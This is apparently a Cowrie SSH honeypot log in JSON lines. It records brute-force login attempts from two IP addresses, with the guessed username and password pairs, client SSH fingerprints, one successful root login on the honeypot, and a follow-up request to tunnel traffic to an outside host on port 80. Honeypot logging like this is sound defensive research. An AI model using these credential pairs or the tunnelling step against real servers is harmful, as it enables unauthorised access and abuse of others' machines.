{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:05:22.724930Z","src_ip":"212.227.125.160","session":"bd277cfdf349"}
{"eventid":"cowrie.login.failed","username":"www","password":"password1","message":"login attempt [www/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T07:05:25.020240Z","src_ip":"212.227.125.160","session":"bd277cfdf349"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:05:26.679244Z","src_ip":"212.227.125.160","session":"bd277cfdf349"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49444,"dst_ip":"1.2.3.4","dst_port":22,"session":"6753fbe5539b","protocol":"ssh","message":"New connection: 212.227.235.229:49444 (1.2.3.4:22) [session: 6753fbe5539b]","sensor":"my-vps","timestamp":"2025-08-31T07:05:49.840066Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:05:50.945968Z","src_ip":"212.227.235.229","session":"6753fbe5539b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:05:51.429682Z","src_ip":"212.227.235.229","session":"6753fbe5539b"}
{"eventid":"cowrie.login.failed","username":"lai","password":"123456","message":"login attempt [lai/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T07:05:56.278219Z","src_ip":"212.227.235.229","session":"6753fbe5539b"}
{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:05:57.457042Z","src_ip":"212.227.235.229","session":"6753fbe5539b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41352,"dst_ip":"1.2.3.4","dst_port":22,"session":"88746bc200c9","protocol":"ssh","message":"New connection: 212.227.235.229:41352 (1.2.3.4:22) [session: 88746bc200c9]","sensor":"my-vps","timestamp":"2025-08-31T07:06:00.269640Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:01.029438Z","src_ip":"212.227.235.229","session":"88746bc200c9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:06:01.030444Z","src_ip":"212.227.235.229","session":"88746bc200c9"}
{"eventid":"cowrie.login.failed","username":"www","password":"admin123","message":"login attempt [www/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:07.027663Z","src_ip":"212.227.235.229","session":"88746bc200c9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":61440,"dst_ip":"1.2.3.4","dst_port":22,"session":"a32ca02394fa","protocol":"ssh","message":"New connection: 212.227.235.229:61440 (1.2.3.4:22) [session: a32ca02394fa]","sensor":"my-vps","timestamp":"2025-08-31T07:06:08.181261Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:08.182338Z","src_ip":"212.227.235.229","session":"a32ca02394fa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":61732,"dst_ip":"1.2.3.4","dst_port":22,"session":"9fa971dbb4f0","protocol":"ssh","message":"New connection: 212.227.235.229:61732 (1.2.3.4:22) [session: 9fa971dbb4f0]","sensor":"my-vps","timestamp":"2025-08-31T07:06:08.319008Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:08.319914Z","src_ip":"212.227.235.229","session":"9fa971dbb4f0"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-31T07:06:08.454213Z","src_ip":"212.227.235.229","session":"9fa971dbb4f0"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:08.802097Z","src_ip":"212.227.235.229","session":"88746bc200c9"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:06:08.858800Z","src_ip":"212.227.235.229","session":"9fa971dbb4f0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-31T07:06:08.993862Z","session":"9fa971dbb4f0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59300,"dst_ip":"1.2.3.4","dst_port":22,"session":"b4b0b7f5d94e","protocol":"ssh","message":"New connection: 212.227.125.160:59300 (1.2.3.4:22) [session: b4b0b7f5d94e]","sensor":"my-vps","timestamp":"2025-08-31T07:06:21.557407Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:22.152252Z","src_ip":"212.227.125.160","session":"b4b0b7f5d94e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:06:22.152955Z","src_ip":"212.227.125.160","session":"b4b0b7f5d94e"}
{"eventid":"cowrie.login.failed","username":"www","password":"admin123","message":"login attempt [www/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:24.234575Z","src_ip":"212.227.125.160","session":"b4b0b7f5d94e"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:25.852511Z","src_ip":"212.227.125.160","session":"b4b0b7f5d94e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49532,"dst_ip":"1.2.3.4","dst_port":22,"session":"68b55c172fc9","protocol":"ssh","message":"New connection: 212.227.125.160:49532 (1.2.3.4:22) [session: 68b55c172fc9]","sensor":"my-vps","timestamp":"2025-08-31T07:06:35.923727Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49556,"dst_ip":"1.2.3.4","dst_port":22,"session":"39a157f1936a","protocol":"ssh","message":"New connection: 212.227.125.160:49556 (1.2.3.4:22) [session: 39a157f1936a]","sensor":"my-vps","timestamp":"2025-08-31T07:06:35.924972Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49560,"dst_ip":"1.2.3.4","dst_port":22,"session":"34becd03146d","protocol":"ssh","message":"New connection: 212.227.125.160:49560 (1.2.3.4:22) [session: 34becd03146d]","sensor":"my-vps","timestamp":"2025-08-31T07:06:35.925623Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49584,"dst_ip":"1.2.3.4","dst_port":22,"session":"55360f5a5063","protocol":"ssh","message":"New connection: 212.227.125.160:49584 (1.2.3.4:22) [session: 55360f5a5063]","sensor":"my-vps","timestamp":"2025-08-31T07:06:35.926971Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49578,"dst_ip":"1.2.3.4","dst_port":22,"session":"c21f94e2f119","protocol":"ssh","message":"New connection: 212.227.125.160:49578 (1.2.3.4:22) [session: c21f94e2f119]","sensor":"my-vps","timestamp":"2025-08-31T07:06:35.928321Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49546,"dst_ip":"1.2.3.4","dst_port":22,"session":"e821643035ec","protocol":"ssh","message":"New connection: 212.227.125.160:49546 (1.2.3.4:22) [session: e821643035ec]","sensor":"my-vps","timestamp":"2025-08-31T07:06:35.929361Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49592,"dst_ip":"1.2.3.4","dst_port":22,"session":"07d50f3ab65f","protocol":"ssh","message":"New connection: 212.227.125.160:49592 (1.2.3.4:22) [session: 07d50f3ab65f]","sensor":"my-vps","timestamp":"2025-08-31T07:06:35.930543Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49566,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb61c17f2b45","protocol":"ssh","message":"New connection: 212.227.125.160:49566 (1.2.3.4:22) [session: cb61c17f2b45]","sensor":"my-vps","timestamp":"2025-08-31T07:06:35.931573Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:35.932678Z","src_ip":"212.227.125.160","session":"68b55c172fc9"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:35.933599Z","src_ip":"212.227.125.160","session":"39a157f1936a"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:35.934256Z","src_ip":"212.227.125.160","session":"34becd03146d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:35.935348Z","src_ip":"212.227.125.160","session":"55360f5a5063"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:35.936200Z","src_ip":"212.227.125.160","session":"c21f94e2f119"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:35.936953Z","src_ip":"212.227.125.160","session":"e821643035ec"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:35.937803Z","src_ip":"212.227.125.160","session":"07d50f3ab65f"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:35.938587Z","src_ip":"212.227.125.160","session":"cb61c17f2b45"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:35.974468Z","src_ip":"212.227.125.160","session":"68b55c172fc9"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:35.976743Z","src_ip":"212.227.125.160","session":"34becd03146d"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:35.978314Z","src_ip":"212.227.125.160","session":"39a157f1936a"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:35.979933Z","src_ip":"212.227.125.160","session":"c21f94e2f119"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:35.981339Z","src_ip":"212.227.125.160","session":"55360f5a5063"}
